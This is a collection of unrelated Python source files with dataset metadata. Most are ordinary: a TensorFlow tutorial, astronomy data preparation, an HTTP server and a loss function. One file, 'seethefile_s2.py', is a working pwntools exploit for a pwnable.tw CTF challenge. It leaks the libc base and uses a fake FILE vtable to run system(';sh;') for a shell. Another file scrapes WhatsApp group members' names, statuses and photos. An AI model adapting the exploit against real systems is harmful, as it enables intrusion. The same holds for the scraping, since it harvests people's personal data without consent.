cv2.waitKey(1)== 27 or cv2.waitKey(1) == ord('q') :\n break\n \n cv2.destroyAllWindows()\n cap.release()\n print(f'{idx} --> [INFO] Finished Video {os.path.basename(video_file)}') \n \n elif args.mode == 'image':\n frame = cv2.imread(args.img_path)\n faces = face_recogniser(preprocess(img))\n if faces is not None:\n Draw_face_names(faces, img, confidence= args.confidence)\n cv2.imshow(os.path.basename(args.img_path), np.array(img)[...,::-1])\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n\n main()\n\n\n","sub_path":"infer_demo.py","file_name":"infer_demo.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"513023698","text":"import tensorflow as tf\n\nsession = tf.Session()\n\nW = tf.Variable([.3], tf.float32)\nb = tf.Variable([-.3], tf.float32)\n\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\n\nlinear_model = W * x + b\n\ninit = tf.global_variables_initializer()\nsession.run(init)\n\nsquared_deltas = tf.square(linear_model - y)\nloss = tf.reduce_sum(squared_deltas)\n\nprint('org loss:', session.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))\n\n# the best W and b\nfix_W = tf.assign(W, [-1.])\nfix_b = tf.assign(b, [1.])\nsession.run([fix_W, fix_b])\nprint('manual fix loss:', session.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))\n\n# reset values to wrong\nsession.run(init)\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\nx_train = [1, 2, 3, 4]\ny_train = [0, -1, -2, -3]\n\nprint('training...')\n\nfor i in range(1000):\n session.run(train, {x: x_train, y: y_train})\n\ncurr_W, curr_b, curr_loss = session.run([W, b, loss], {x: x_train, y: y_train})\nprint(\"W: %s b: %s loss: %s\" % (curr_W, curr_b, curr_loss))\n","sub_path":"gettingstarted.py","file_name":"gettingstarted.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"576196509","text":"from pwn import *\n\ns = remote(\"chall.pwnable.tw\", 10200)\n_ = s.recvuntil(\"Your choice :\")\n\ndef open(file):\n\ts.sendline(str(1))\n\t_ = s.recvuntil(\"want to see :\")\n\ts.sendline(file)\n\t_ = s.recvuntil(\"Your choice :\")\ndef read():\n\ts.sendline(str(2))\n\t_ = s.recvuntil(\"Your choice :\")\ndef write():\n\ts.sendline(str(3))\n\treturn s.recvuntil(\"Your choice :\")\ndef close():\n\ts.sendline(str(4))\n\t_ = s.recvuntil(\"Your choice :\")\ndef exit(name):\n\ts.sendline(str(5))\n\t_ = s.recvuntil(\"Leave your name :\")\n\ts.sendline(name)\n\t_ = s.recv()\t\t\t\n\nif __name__ == \"__main__\":\n\tlibc = ELF(\"libc_32.so.6\")\n\tsys_off = libc.symbols['system']\n\n\topen(\"/proc/self/maps\")\n\tread()\n\n\tread()\n\tret = write()\n\tret = \"0x\" + ret[25:33]\n\tlibc_base = int(ret, 16)\n\tsys_addr = libc_base + sys_off\n\tclose()\n\t# --------------------------------------------------\n\t'''\n\t# my control flow is as followed\n\t# fclose_0\n\t# cmp byte ptr [esi + 46h], 0 ==> False <--- weird\n\t# test ah, 20h ==> False\n\t# and edx, 8000h ==> False <-- becase of this condition I set 0x8000 in (1)\n\t# test edx, edx ==> False\n\t# - mov eax, [esi + 4Ch] ; esi is new_fp, so new_fp + 4c is vtable (the 20th element) <----- must read asm in libc file \n\t# - sub esp, 8\n\t# - push 0\n\t# - push esi\n\t# - call dword ptr [eax + 8] ; vtable + 8 should be SYSTEM (2)\n\t'''\n\tpayload = \"\"\n\tpayload += p32(0xdfff8fff)*2\n\tpayload += p32(sys_addr)\n\tpayload += ';sh;'+\"a\"*16\n\tpayload += p32(0x804b260)\n\tpayload += \"a\"*40 # did not make sence here\n\tpayload += p32(0x804b260)\n\n\t# ---------------------------------------------------\n\texit(payload)\n\n\ts.interactive()\n","sub_path":"seethefile_s2.py","file_name":"seethefile_s2.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"129274267","text":"\nimport sys, os, time, random\nimport cv2\nfrom selenium import webdriver\nimport numpy as np\nimport urllib.request\n\n\n\n# Web Scrapper Part\nif os.name == \"nt\":\n driverPath = \"Miscellaneous/driver/chromedriver_2.24.exe\"\n dataPath = \"C:\\\\Users\\\\Akshay L Aradhya\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Whatsapp DP Scrapper 2\"\nelse :\n driverPath = \"Miscellaneous/driver/chromedriver\"\n dataPath = \"Data/Group Images\"\n\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--user-data-dir=\"+dataPath)\ndriver = webdriver.Chrome(chrome_options=options, executable_path=driverPath)\ndriver.implicitly_wait(5)\ndriver.get('https://web.whatsapp.com/')\n\nip = input(\"1.Select group\\n2.Go to Group Info\\n3.Wait for everything to load\\n4.Press enter \")\n\nif ip==\"\":\n paneThree = driver.find_element_by_class_name(\"pane-three\")\n nameList = paneThree.find_elements_by_class_name(\"infinite-list-item\")\n\n print(len(nameList), \"contacts found\")\n\n file = open('Miscellaneous/Data/Images/Name List.txt', 'w')\n\n for contact in nameList:\n # time.sleep(2)\n name = contact.find_element_by_class_name(\"chat-title\").find_element_by_class_name(\"emojitext \").text\n if name==\"You\":\n name = \"Akshay L Aradhya\"\n status = contact.find_element_by_class_name(\"chat-status\").get_attribute(\"title\").encode('unicode_escape')\n imagePath = contact.find_element_by_class_name(\"chat-avatar\").find_element_by_tag_name(\"img\").get_attribute(\"src\")\n imagePath.replace(\"t=s\", \"t=l\")\n urllib.request.urlretrieve(imagePath, \"Miscellaneous/Data/Images/\"+name+\".jpg\")\n file.write(name+\"\\n\")\n print(name)\n\n print(\"Done\")\n file.close()\nelse:\n print(\"Skipping web scrapper\")\ndriver.quit()\n\n\n# OpenCV Collage Part\nnameList = []\nwith open('Miscellaneous/Data/Images/Name List.txt') as file:\n for line in file:\n line = line.strip()\n nameList.append(line)\nnameList.sort()\nprint(len(nameList), \"names found\")\n\nfiles = os.listdir('C:/Users/Akshay L Aradhya/Pictures/Me/WhatsApp Profile Photos')\nprint(len(files), \" files found\")\n\n\nfor filename in files:\n name = filename[:-20]\n print(\"'\"+name+\"'\")\n image = cv2.imread('C:/Users/Akshay L Aradhya/Pictures/Me/WhatsApp Profile Photos/'+filename)\n cv2.imwrite(\"Miscellaneous/Data/CV Images/\"+name+\".png\", image)\n\nheight = 1000\nwidth = 1000\npadding = 0\n\nimage = np.zeros((height*9, width*9, 3), np.uint8)\n\nfor i in range(1, 9):\n for j in range(0, 9):\n x = j*width + padding\n y = i*height + padding\n contactImage = cv2.imread(\"Miscellaneous/Data/CV Images/\"+nameList[(i-1)*9+j]+\".png\")\n contactImage = cv2.resize(contactImage, (width-2*padding, height-2*padding))\n image[ y:y+height-2*padding, x:x+width-2*padding] = contactImage\n\ncv2.imwrite(\"Miscellaneous/Data/CV Images/#Collage.png\", image)\n","sub_path":"Miscellaneous/Whatsapp_Group_DP_Saver.py","file_name":"Whatsapp_Group_DP_Saver.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"495496405","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 20 17:16:00 2016\n\n@author: ctchen\nMake plots for the NuSTAR low mass galaxy paper using new data\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom astropy.io import ascii\n'''\nData to load : \n1. All serendip spec-z source with stellar mass measurements\n2. Primary/secondary catalogs with NuSTAR counts\n3. Low-mass subsample\n'''\n#1. \nser = pd.read_csv(home+'/work_scripts/dwarf/data/ser_mass_final.csv')\nser.set_index('NuID',inplace=True)\nser.drop('Unnamed: 0',axis=1,inplace=True)\n\n#2. \nprimary = pd.read_csv(home+'/work_scripts/dwarf/data/primary_phot.csv')\n#B2_1204_p34_s1 was in the ``robust table'', but it's now in the ``secondary table''\n#given the low counts, moving it back to ``primary'' and use result from the old robust table\nb2 = primary.xs(0).copy(deep=True)\nb2[:] = np.nan\nb2.NUSTAR_ID = 'B2_1204p34_s1'\nb2.name=len(primary)\nprimary = primary.append(b2)\nsecondary = pd.read_csv(home+'/work_scripts/dwarf/data/secondary_phot.csv')\nprimary.set_index('NUSTAR_ID',inplace=True)\nsecondary.set_index('object',inplace=True)\nsecondary.drop('B2_1204p34_s1',inplace=True)\ncprt = pd.read_csv(home+'/work_scripts/dwarf/data/cprt.csv')\nb2 = cprt.loc[94, ['FB_FPROB','FB_FPROB_DBLND','FB_EXP','FB_BGD_CTS_DBLND','FB_NET_CTS_DBLND','FB_NET_CTS_DBLND_ERR',\n'SB_BGD_CTS_DBLND','SB_NET_CTS_DBLND','SB_NET_CTS_DBLND_ERR',\n'HB_BGD_CTS_DBLND','HB_NET_CTS_DBLND','HB_NET_CTS_DBLND_ERR',\n'SB_FPROB', 'HB_FPROB','FB_FLUX_DBLND','SB_FLUX_DBLND','HB_FLUX_DBLND',\n'FB_FLUX_DBLND_ERR','SB_FLUX_DBLND_ERR','HB_FLUX_DBLND_ERR','GAMMA','LUM_10TO40KEV_REST',\n'SB_EXP', 'HB_EXP']]\ndel cprt\ncol_pri = ['MIN_LOG_FPROB','FPROB_3_24_DBLND','EXP_3_24','BGD_3_24_CTS_DBLND','NET_3_24_CTS_DBLND','DNET_3_24_CTS_DBLND',\n 'BGD_3_8_CTS_DBLND','NET_3_8_CTS_DBLND','DNET_3_8_CTS_DBLND',\n 'BGD_8_24_CTS_DBLND','NET_8_24_CTS_DBLND','DNET_8_24_CTS_DBLND',\n 'FPROB_3_8_DBLND','FPROB_8_24_DBLND','FLUX_3_24_DBLND','FLUX_3_8_DBLND','FLUX_8_24_DBLND',\n 'DFLUX_3_24_DBLND','DFLUX_3_8_DBLND','DFLUX_8_24_DBLND','GAMMA_DBLND_USED','LOGLX_10_40',\n 'EXP_3_8','EXP_8_24']\ncol_sec = ['fp_Poi_3_24_C','fp_bin_3_24_C','t_3_24_C','Bsrc_3_24_C','Snet_3_24_C',\n'Snet_3_24_C_lowERR','Snet_3_24_C_uppERR','Bsrc_3_8_C','Snet_3_8_C','Snet_3_8_C_lowERR',\n'Snet_3_8_C_uppERR','Bsrc_8_24_C','Snet_8_24_C','Snet_8_24_C_lowERR','Snet_8_24_C_uppERR',\n'fp_Poi_3_8_C','fp_Poi_8_24_C','fp_bin_3_8_C','fp_bin_8_24_C','f_3_24_C','f_3_8_C','f_8_24_C',\n'f_3_24_C_lowERR','f_3_24_C_uppERR','f_3_8_C_lowERR','f_3_8_C_uppERR',\n'f_8_24_C_lowERR','f_8_24_C_uppERR','L_10_40_C','t_3_8_C','t_8_24_C']\n\nb2.LUM_10TO40KEV_REST = np.log10(b2.LUM_10TO40KEV_REST)\nprimary.loc['B2_1204p34_s1',col_pri] = b2.values\n\n\n#3.\nser_lm = pd.read_csv(home+'/work_scripts/dwarf/data/ser_lowmass_final.csv')\nser_lm.set_index('NuID',inplace=True)\nser_lm.drop('Unnamed: 0',axis=1,inplace=True)\n#All deblended source counts from pri\n#Will confirm the source count properties from secondary\ncols = ['Fp','Fp_dblnd','Fp_poi','Fp_bin','Exp','BGD','SRC','ESRC','ESRCU',\n 'BGD_38','SRC_38','ESRC_38','ESRC_38U','BGD_824','SRC_824','ESRC_824','ESRC_824U',\n 'Fp_38','Fp_824','Fp_38b','Fp_824b','flux_324','flux_38','flux_824',\n 'eflux_324','eflux_324U','eflux_38','eflux_38U','eflux_824','eflux_824U',\n 'gamma_nus','l1040','EXP_3_8','EXP_8_24']\n \ncols_pri = ['Fp','Fp_dblnd','Exp','BGD','SRC','ESRC',\n 'BGD_38','SRC_38','ESRC_38','BGD_824','SRC_824','ESRC_824',\n 'Fp_38','Fp_824','flux_324','flux_38','flux_824',\n 'eflux_324','eflux_38','eflux_824','gamma_nus','l1040',\n 'EXP_3_8','EXP_8_24']\ncols_sec = ['Fp_poi','Fp_bin','Exp','BGD','SRC','ESRC','ESRCU',\n 'BGD_38','SRC_38','ESRC_38','ESRC_38U','BGD_824','SRC_824','ESRC_824','ESRC_824U',\n 'Fp_38','Fp_824','Fp_38b','Fp_824b','flux_324','flux_38','flux_824',\n 'eflux_324','eflux_324U','eflux_38','eflux_38U','eflux_824','eflux_824U',\n 'l1040','EXP_3_8','EXP_8_24']\n\ndf = pd.DataFrame(index=ser_lm.index,columns=cols)\nfor i in np.intersect1d(ser_lm.index,primary.index):\n df.loc[i,cols_pri] = primary.loc[i,col_pri].values\n\nfor i in np.intersect1d(ser_lm.index,secondary.index):\n df.loc[i,cols_sec] = secondary.loc[i,col_sec].values\n\nfrom astropy import coordinates as cd\ncat = cd.SkyCoord(ser_lm.RA_nustar,ser_lm.DEC_nustar,unit=(u.degree,u.degree))\nnames=[]\n\nfor i in cat.to_string('hmsdms'):\n ni = 'J'+i[0:2]+i[3:5]+i[15:18]+i[19:21]\n names.append(ni)\nnames[8] = 'J0653+7424'\nnames[10] = 'J1016-3329'\n\nser_lm['NAME'] = names\nser_lm = pd.concat((ser_lm,df),axis=1)\n\n#Use Fp_bin as Fp for secondary\nfor i in ser_lm[ser_lm.Fp.isnull()].index:\n if not ser_lm.loc[i,'Fp_bin'] == 0 :\n ser_lm.loc[i,'Fp'] = np.log10(ser_lm.loc[i,'Fp_bin'])\n else:\n ser_lm.loc[i,'Fp'] = np.log10(ser_lm.loc[i,'Fp_poi'])\n print(i,'use Poisson')\n\n#kcorrect mass\nser_lm['mass_kc'] = np.zeros(len(ser_lm),dtype=float)+np.nan\nser_lm.loc[['Nu_SDSSJ1034p6001_002','Nu_1ES0229p200_002',\n 'Nu_Mrk1210_003','Nu_IC751_002','Nu_NGC7212_001','Nu_WAS49b_003',\n 'SN2014C_s1','B2_1204p34_s1'],'mass_kc'] = \\\n [9.3805185,9.7898671,9.6437881,9.1315119,8.6367218,9.8377933,9.7227483,9.9330199]\n \n\n#BR_uerr \ndf_behr = ser_lm.loc[:,['SRC_824','SRC_38','BGD_824','BGD_38']].copy(deep=True)\ndf_behr.rename(columns={'SRC_824':'hardsrc','SRC_38':'softsrc','BGD_824':'hardbkg','BGD_38':'softbkg'},inplace=True)\ndf_behr['softarea'] = np.zeros(len(df_behr))+10.\ndf_behr['hardarea'] = np.zeros(len(df_behr))+10.\n#cols = ['BR','BR_LB','BR_UB','HR','HR_LB','HR_UB','logBR','logBR_LB','logBR_UB']\n#dfout=pd.DataFrame(index = df_behr.index,\n# columns = cols)\n\nfrom ctc_xray import *\n \ndfout = behrhug(df_behr,invertBR=True)\n\nser_lm = pd.concat((ser_lm,dfout),axis=1)\n\nser_lm['BR_uerr'] = ser_lm.BR_UB-ser_lm.BR\nser_lm['BR_lerr'] = ser_lm.BR-ser_lm.BR_LB\n\n#Useful columns\nc_nu = ['SRC_38','SRC_824','ESRC_824','BR']\nc_phot = ['SDSSu','SDSSuerr_m','SDSSg','SDSSgerr_m','SDSSr','SDSSrerr_m','SDSSi','SDSSierr_m','SDSSz','SDSSzerr_m',\n '2MASSJ','2MASSJerr','2MASSH','2MASSHerr','2MASSKs','2MASSKserr',\n 'W1','W1err','W2','W2err','W3','W3err','W4','W4err']\n\n#Caution on these objects\n#Nu_RGB_J2313p147_002 -- uncertain optical photometry (too faint)\n#Mrk1210_sA3 -- no HB detection, no 2MASS, no significant soft X-ray XMM & Chandra data even when merged ~40 ks data\n# -- also, optical/WISE counterpart identification is hard\n# -- Check position of spectrum taken.\n# don't use, no detection after deblending\n\n#\n#IC750 -- Soft X-ray detection, potentially very interesting? \n#SN2014C_001 -- bad NIR-MIR photometry identification, check\n#Manually coadded 4 chandra observations to create ~40ks exposure\n#thaw gamma, gamma = 0.89 \\pm 1\n#Chandra flux 3-8 keV = 1.42e-14 \n#chandra 2-10 keV lumin. = 1.162e42\n#chandra NH = 1e-20 \\pm 100 chi^2 = 1.66 \n#freeze gamma to 1.8, chi^2 = 2.49\n#NH = 1.46e22, flux = 9.99e-15, lumin = 8.57e41\n\n\n#IC2560_s2 : faint chandra obsid = 1592, out of fov in obsid = 4908\n#try XMM 1-10 keV: \n#PN - gamma = 1.78\\pm0.37, NH = 7.38e22 \\pm 2.44 e22, chisq = 0.8329 -- model more complicated?\n#3-8kev flux = 6.73e-14\n#2-10 kev luminosity = 1.29e43\n\n#NGC7212_s2 -- optical counterpart needs to reconfirm.\n#NGC7212 : no Chandra, XMM data quality is low\n#SDSS photometry does not satisfy S/N > 5, but I'm still using supercosmos anyway... \n#NH_GAL = 3.1e21\n#NH = 6.426e22 \\pm 3.73e22, gamma = 1.8 (freeze)\n#only 4 pha bins, reduced chisq = 1.57\n\n#Mkn6_s1 - checked XMM data, non-uniform rate-time plot\n#extracted spectrum, hard-band has high background and bad fit\n#reduced chisquare = 0.6489, not a good fit\n#NH = 0.14\\pm0.079 * 10^22 , Gamma = 1.89\\pm0.32, L210 = 42.573822756329662\n\n#SDSSJ1713p5728_s1 -- wrong SDSS photometric counterpart. \n\n\n#B2_1204p34_s1 -- XRT has very few counts, convert count rate to flux using PIMMS, \n#assuming galactic absorption and Gamma = 1.8, the flux between 0.5-7 keV is 3.8e-14\n#Note that the original NuSTAR catalog (2015) has a very different count rates for this object \n#suspicious? \n\n#ser_lm.drop('Nu_RGB_J2313p147_002',inplace=True)\n\nser_lm.drop('Nu_Mrk1210_003',inplace=True)\n#ser_lm.drop('Nu_SDSSJ1713p5729_002',inplace=True)\n#ser_lm.drop('Nu_Mrk1210_003',inplace=True)\n\n#SOFT X-RAY measurements\nser_lm['NH'] = np.zeros(len(ser_lm))+np.nan\nser_lm['l210'] = np.zeros(len(ser_lm))+np.nan\nser_lm['NHLErr'] = np.zeros(len(ser_lm))+np.nan\nser_lm['NHUErr'] = np.zeros(len(ser_lm))+np.nan\n\nser_lm.loc['Nu_1ES0229p200_002',['NH','l210','NHLErr','NHUErr']] = \\\n[23.11,42.25188,0.28,0.21]\nser_lm.loc['Nu_NGC1320_002',['NH','l210','NHLErr','NHUErr']] = \\\n[20.0,41.602059991327963,np.nan,np.nan]\nser_lm.loc['Nu_Mkn_6_001',['NH','l210','NHLErr','NHUErr']] = \\\n[21.24,42.63,1.56,0.36]\n#Mkn6 -- 3 XMM observations, one with Limited photon counts in the hard band\n#Use 2 XMM >20ks observations and 1 Chandra\n#XMM 6154 : L210 = 42.77, NH = 19.98+1.25-4.98\n#XMM 14423 : L210 = 42.40, NH = 21.19+0.23-0.36\n#Chandra : L210 = 42.63, NH = 20.03+1.59-1.79\nser_lm.loc['Nu_IC4329A_002', ['NH','l210','NHLErr','NHUErr']] = [np.nan,42.46,np.nan,np.nan]\n# Too few counts for spectral fitting, using 3XMM DR5 results\nser_lm.loc['Nu_SDSSJ1034p6001_002',['NH','l210','NHLErr','NHUErr']] = [20.96,43.064345657162171,np.nan,0.54]\n#ser_lm.loc['Nu_SDSSJ1713p5729_002',['NH','l210','NHErr']] = [np.nan,np.nan,np.nan] #faint XMM\nser_lm.loc['Nu_IC751_002',['NH','l210','NHLErr','NHUErr']] = \\\n[21.475296284157452,38.594392550375424,0.183,0.128] #might have maser\nser_lm.loc['Nu_NGC7212_001',['NH','l210','NHLErr','NHUErr']] = \\\n[np.nan,42.49,np.nan,np.nan]\nser_lm.loc['IC2560_s2',['NH','l210','NHLErr','NHUErr']] = \\\n[22.42,43.16,0.16,0.13]\nser_lm.loc['Nu_WAS49b_003',['NH','l210','NHLErr','NHUErr']] = \\\n[21.322219,42.62,np.nan,np.nan]\n\nser_lm.loc['SN2014C_s1',['NH','l210','NHLErr','NHUErr']] = \\\n[np.nan,41.591,np.nan,np.nan]\nser_lm.loc['B2_1204p34_s1',['NH','l210','NHLErr','NHUErr']] = [np.nan,42.65,np.nan,np.nan] #Swift/XRT\nser_lm.loc[['SN2014C_s1','Nu_NGC7212_001'],'mass_sed'] = ser_lm.loc[['SN2014C_s1','Nu_NGC7212_001'],'mass_kc'].values\nser_lm.loc[['SN2014C_s1','IC2560_s2','B2_1204p34_s1','Nu_IC751_002'],'l1040'] = \\\nnp.log10(np.asarray([5.88933e+42,2.49598e+43,1.39879e+43,6.7e39]))\n\n##Optical AGN or not?\n#needs to be sure : IC2560_s2\nser_lm['opt'] = [True for x in range(len(ser_lm))]\nser_lm.loc['Nu_IC4329A_002','opt'] = False \nser_lm.loc['Nu_Mkn_6_001','opt'] = False\nser_lm.loc['SN2014C_s1','opt'] = False\n\n\n\nr_star= pd.read_csv(home+'/work_scripts/dwarf/r_z.csv')\n\n\nsb70d=pd.read_csv(home+'/work_scripts/dwarf/sb70d.csv') \nsb70d.NH = np.log10(abs(sb70d.NH.values)) \nsb70d['ur'] = sb70d.umag-sb70d.rmag\nsb70d['gr'] = sb70d.gmag-sb70d.rmag\n\nser_lm['W2W3'] = ser_lm.W2-ser_lm.W3\nser_lm['W1W2'] = ser_lm.W1-ser_lm.W2\n\ncolors_lm = ['blue','green','orangered','saddlebrown','darkviolet','indianred',\n 'crimson','red','cyan','black','darkgrey']\n \nmrks = ['o','D','H','*','s','^','p','v','<','>','d']\nfillstyle = ['full' for x in range(len(ser_lm))]\n\nser_lm['color'] = colors_lm\nser_lm['mrk'] = mrks\nser_lm['fillstyle'] = fillstyle\nser_lm.loc[['Nu_IC4329A_002','Nu_Mkn_6_001','SN2014C_s1'],'fillstyle'] = 'none'\nser_lm['mrksize'] = [1, 0.8, 0.9, 1.2, 0.9, 1.,1.,1.,1.,0.95,0.95]\n\n#compute L10-40 for Nu_IC4329A_002 and Nu_Mkn_6_001 (not computed for some unknown reason)\nfrom chen_xray import *\nindex = 'Nu_IC4329A_002'\nz = ser_lm.loc[index,'z']\nl1040 = 4*np.pi*Distance(z=z).cgs.value**2*ser_lm.loc[index, 'flux_824']*\\\nint_pl(10.,40.,primary.loc[index,'GAMMA_DBLND_USED'])/\\\nint_pl(8*(1+z),24*(1+z),primary.loc[index,'GAMMA_DBLND_USED'])\nl210 = 4*np.pi*Distance(z=z).cgs.value**2*8.120e-14*int_pl(2.,10.,1.8)/int_pl(0.2,12.,1.8)\nser_lm.loc[index,'l1040'] = 1*np.log10(l1040)\nser_lm.loc[index,'l210'] = np.log10(l210)\n\nindex = 'Nu_Mkn_6_001'\nz = ser_lm.loc[index,'z']\nl1040 = 4*np.pi*Distance(z=z).cgs.value**2*ser_lm.loc[index, 'flux_824']*\\\nint_pl(10.,40.,primary.loc[index,'GAMMA_DBLND_USED'])/\\\nint_pl(8*(1+z),24*(1+z),primary.loc[index,'GAMMA_DBLND_USED'])\nser_lm.loc[index,'l1040'] = 1*np.log10(l1040)\n\n#ser_lm.ESRC_824/ser_lm.SRC_824 > 0.5 \n#log FPROB_DBLND > -2 : 'Nu_IC751_002','Nu_NGC7212_001'\n#BINFPROB > 0.004 : 'SN2014C_s1'\n#set L1040 for these objects as upper limits\nser_lm.loc[:,'l1040'] = ser_lm.l1040.values.astype(float)\nser_lm.loc[['Nu_IC751_002','Nu_NGC7212_001','SN2014C_s1'],'l1040'] = ser_lm.loc[['Nu_IC751_002','Nu_NGC7212_001','SN2014C_s1'],'l1040'].values*-1\n\n#Sort by RA \nser_lm.sort('RA_nustar',inplace=True)\n\nser_lm['gr'] = ser_lm.gr_all.values\nser_lm.loc[ser_lm[ser_lm.SDSSr.notnull()].index.values,'gr'] = \\\nser_lm[ser_lm.SDSSr.notnull()].SDSSg.values - ser_lm[ser_lm.SDSSr.notnull()].SDSSr.values\n\nser_lm['l210n'] = ser_lm.flux_38*4*np.pi*Distance(z=ser_lm.z).cgs.value**2\n\nfor index,row in ser_lm.iterrows():\n ser_lm.loc[index,'l210n'] = np.log10(row.l210n*int_pl(2.,10.,1.8)/int_pl(3*(1+row.z),8*(1+row.z),1.8))\n#Write LATEX TABLE\n#Useful columns\nc_nu = ['Fp','SRC_38','ESRC_38','SRC_824','ESRC_824','BR','BR_lerr','BR_uerr',\n 'flux_38','eflux_38','flux_824','flux_324','eflux_824','eflux_324','Exp']\n \nc_phot = ['SDSSu','SDSSuerr_m','SDSSg','SDSSgerr_m','SDSSr','SDSSrerr_m','SDSSi','SDSSierr_m','SDSSz','SDSSzerr_m',\n '2MASSJ','2MASSJerr','2MASSH','2MASSHerr','2MASSKs','2MASSKserr',\n 'W1','W1err','W2','W2err','W3','W3err','W4','W4err']\nc_wise = ['W1','W1err','W2','W2err','W3','W3err','W4','W4err','W1W2','W2W3']\n\n\n#change .ix[0:6 to .ix[6:] for the rest \n\n\n#read for Mstar-MBH plots\npath=home+'/Dropbox/nustar_dwarf/otherdata/'\ncolspecs=[(1,5),(5,13),(13,21),(21,32),(32,40),(40,48),(48,56),(56,64),(64,69),(69,76),(76,84),(84,92),(92,100),(100,108),(108,116),(116,131),(131,140),(140,151),(151,163),(163,174),(174,190),(190,198),(198,208),(208,215),(215,225),(225,230),(230,234)]\nkh13_bulge=pd.read_fwf(path+'kh13_ar4-bulges.dat',colspecs=colspecs)\nkh13_bulge.drop('1',axis=1,inplace=True)\nkh13_bulge.drop(41,inplace=True)\nkh13_bulge.loc[:,'logMBH']=np.log10(kh13_bulge.loc[:,'logMBH'].values)\ncolspecs=[(4,14),(14,20),(20,33),(33,41),(41,50),(50,60),(60,68),(68,78),(78,90),(90,100),(100,111),(111,118),(118,128),(128,145),(145,154),(154,165)]\nkh13_e=pd.read_fwf(path+'kh13_ar4-ellipticals.dat',colspecs=colspecs)\nkh13_e.loc[:,'M_BH']=np.log10(kh13_e.loc[:,'M_BH'].values)\nkh13_e.rename(columns={'M_BH':'logMBH'},inplace=True)\n#load Reins & Volonteri 2015's Mgalaxy-Mbh relation\nrv15 = ascii.read(path+'reines15_blagn.txt').to_pandas()\nrv15.rename(columns={'logM*':'logmass'},inplace=True)\n\nb08 = pd.read_csv(path+'barth2008.csv')\ngh = pd.read_csv(path+'greene_ho_2007.csv')\ndgh=pd.read_csv(home+'/work_scripts/dwarf/Dong12_GH07.csv')\ndgh.rename(columns={'N_H':'NH','logM':'logmbh','logLHa':'lha'},inplace=True)\ndgh.loc[dgh[dgh.z.isnull()].index.values,'z'] = \\\n[0.0489,0.0722,0.0416,0.0726,0.0644,0.0606,0.0662,0.0732,0.0710,0.0715,0.0710,0.0614,0.0552,0.0444,0.0562,\n0.0684,0.0655,0.0570,0.0433,0.0755]\n\n\n'''\nchecking nustar L210 and soft X-ray L210 \nsns.regplot(ser_lm.l210,ser_lm.l210n,fit_reg = False)\nplt.plot(np.linspace(39.,44,10),np.linspace(39.,44.,10))\nplt.xlim(37.,44.)\nplt.ylim(37.,44)\n'''\n","sub_path":"plots/plot_new_dataprepare.py","file_name":"plot_new_dataprepare.py","file_ext":"py","file_size_in_byte":15227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528991127","text":"__author__ = 'Michel'\n\n#import SimpleHTTPServer\nimport SocketServer\nimport threading\nimport atexit\nfrom BlocklyPropHTTPRequestHandler import BlocklyPropHTTPRequestHandler\n\nPORT = 6009\n\n\nclass BlocklyPropServer:\n def __init__(self):\n handler = BlocklyPropHTTPRequestHandler\n self.httpd = SocketServer.TCPServer((\"\", PORT), handler)\n\n self.server_thread = threading.Thread(target=start_server, args=(\"Server-Thread\", self.httpd))\n self.server_thread.start()\n\n #atexit.register(self.stop)\n\n def stop(self):\n self.httpd.shutdown()\n\n\n\ndef start_server(thread_name, server):\n server.serve_forever()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462609587","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom .utils import weight_reduce_loss\r\nimport pdb\r\n\r\n\r\n# This method is only for debugging\r\ndef py_sigmoid_focal_loss(pred,\r\n target,\r\n weight=None,\r\n gamma=2.0,\r\n alpha=0.25,\r\n reduction='mean',\r\n avg_factor=None):\r\n # pred_sigmoid = _sigmoid(pred)\r\n pred_sigmoid = pred.sigmoid()\r\n # pos_loss = (-1) * alpha * ((1 - pred_sigmoid)**gamma) * target * torch.log(pred_sigmoid)\r\n # neg_loss = (-1) * (1 - alpha) * (pred_sigmoid**gamma) * (1 - target) * torch.log(1 - pred_sigmoid)\r\n # loss = (pos_loss.sum() + neg_loss.sum()) * weight / avg_factor\r\n pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)\r\n focal_weight = (alpha * target + (1 - alpha) *\r\n (1 - target)) * pt.pow(gamma)\r\n #\r\n loss = F.binary_cross_entropy_with_logits(\r\n pred, target, reduction='none') * focal_weight\r\n loss = weight_reduce_loss(loss, weight, reduction, avg_factor)\r\n return loss\r\n\r\n\r\nclass FocalLoss(nn.Module):\r\n\r\n def __init__(self,\r\n use_sigmoid=True,\r\n gamma=2.0,\r\n alpha=0.25,\r\n reduction='mean',\r\n loss_weight=1.0):\r\n super(FocalLoss, self).__init__()\r\n assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'\r\n self.use_sigmoid = use_sigmoid\r\n self.gamma = gamma\r\n self.alpha = alpha\r\n self.reduction = reduction\r\n self.loss_weight = loss_weight\r\n\r\n def forward(self,\r\n pred,\r\n target,\r\n weight=None,\r\n avg_factor=None,\r\n reduction_override=None):\r\n assert reduction_override in (None, 'none', 'mean', 'sum')\r\n reduction = (\r\n reduction_override if reduction_override else self.reduction)\r\n if self.use_sigmoid:\r\n loss_cls = self.loss_weight * 